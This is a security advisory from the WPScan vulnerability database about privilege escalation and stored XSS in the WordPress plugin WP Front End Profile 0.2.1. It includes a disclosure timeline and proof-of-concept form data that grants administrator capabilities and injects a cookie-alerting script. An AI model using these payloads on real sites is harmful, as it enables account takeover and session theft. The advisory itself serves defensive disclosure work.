WP Front End Profile <= 0.2.1 - Privilege Escalation & Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
It is possible to modify a POST request to overwrite user meta including 'wp_capabilities' and 'wp_user_level' which results in a privilege escalation vulnerability.

User input is not sanitised or escaped on output resulting in a stored XSS vulnerability.

Timeline:

2016-09-12: Vulnerability found
2016-09-12: Reported to vendor
2016-09-12: Vendor responded
2016-09-14: Vendor released a fixed version (0.2.2)
2016-09-14: Public disclosure
Proof of Concept
Privilege Escalation - Form data

profile[user_email]:subscriber@example.com
profile[wp_capabilities][administrator]:1
profile[wp_user_level]:10
profile[user_url]:
profile[description]:
profile[wpfep_save]:Update Profile
wpfep_nonce_name:99fc626e77
_wp_http_referer:/sample-page/

Stored XSS - Form data

wpmark_tab[testing_field]:example"><script>alert(document.cookie)</script>
wpmark_tab[wpfep_save]:Update Testing
wpfep_nonce_name:02c01469d8
_wp_http_referer:/sample-page/

Affects

Plugin wp-front-end-profile
fixed in version 0.2.2

References

URL https://plugins.trac.wordpress.org/changeset/1495896/wp-front-end-profile

Classification

Type MULTI

Miscellaneous

Submitter Phil Wylie
Submitter Website https://www.philwylie.co.uk/
Submitter Twitter mustardbees
Views 158
Verified No
WPVDB ID 8620

Timeline

Publicly Published 2016-09-14 (3 months ago)
Added 2016-09-15 (3 months ago)
Last Updated 2016-09-15 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.